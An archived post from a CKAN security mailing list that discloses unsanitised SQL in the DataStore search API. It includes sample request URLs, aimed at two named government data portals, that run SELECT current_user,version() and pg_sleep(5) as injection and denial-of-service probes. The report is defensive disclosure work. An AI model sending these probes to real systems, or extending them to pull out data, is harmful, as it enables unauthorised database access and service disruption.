[CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore

• Previous message: [CKAN-Security] Security post from philip.ashlock at gsa.gov requires approval
• Next message: [CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It looks like there are some SQL commands that go unsanitized when using
the CKAN DataStore API. In some scenarios this would lead to a blind sql
injection that could disclose sensitive information in the database, but
I'm not familiar enough with DataStore to test for that. At the very least
the fact that the "sleep()" command is not sanitized does create a denial
of service vulnerability.

Select current_user and version()
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version()
;
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20current_user,version()
;

Sleep for 5 seconds
https://inventory.data.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5)
;
https://data.boston.gov/api/action/datastore_search_sql?sql=SELECT%20pg_sleep(5)
;

I noticed that I couldn't recreate this behavior on https://demo.ckan.org
so perhaps this has been addressed with newer versions of CKAN or the
relevant extensions?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180606/6d9b4bad/attachment.html>

• Previous message: [CKAN-Security] Security post from philip.ashlock at gsa.gov requires approval
• Next message: [CKAN-Security] Blind SQL Injection & DOS vulnerability with CKAN DataStore
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]